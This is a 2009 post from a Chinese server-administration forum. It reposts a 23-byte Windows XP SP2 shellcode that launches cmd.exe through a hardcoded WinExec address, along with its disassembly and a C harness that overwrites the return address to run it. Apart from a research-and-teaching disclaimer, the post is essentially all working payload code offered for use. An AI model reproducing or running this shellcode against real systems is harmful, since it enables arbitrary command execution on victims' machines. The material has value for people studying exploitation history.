服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4460|回复: 0

win32/xp sp2 (En) cmd.exe 23 bytes

[复制链接]
dirtysea 发表于 2009-8-15 01:09:46 | 显示全部楼层 |阅读模式
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/*
  • win32/xp sp2 (En) cmd.exe 23 bytes
  • Author : Mountassif Moad
  • A.K.A : Stack
  • Description : It's a 23 Byte Shellcode which Execute Cmd.exe Tested Under Windows Xp SP2 En
  • get the following if we disassemle this code compiled with olly debugger
  • 00402000  > 8BEC             MOV EBP,ESP
  • 00402002  . 68 65786520      PUSH 20657865
  • 00402007  . 68 636D642E      PUSH 2E646D63
  • 0040200C  . 8D45 F8          LEA EAX,DWORD PTR SS:[EBP-8]
  • 0040200F  . 50               PUSH EAX
  • 00402010  . B8 8D15867C      MOV EAX,kernel32.WinExec
  • 00402015  . FFD0             CALL EAX
  • */
  • #include <stdio.h>
  • unsigned char shellcode[] =
  •                         "\x8b\xec\x68\x65\x78\x65"
  •                         "\x20\x68\x63\x6d\x64\x2e"
  •                         "\x8d\x45\xf8\x50\xb8\x8D"
  •                         "\x15\x86\x7C\xff\xd0";
  • int main ()
  • {
  • int *ret;
  • ret=(int *)&ret+2;
  • printf("Shellcode Length is : %d\n",strlen(shellcode));
  • (*ret)=(int)shellcode;
  • return 0;
  • }
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-4-25 14:37 , Processed in 0.218341 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表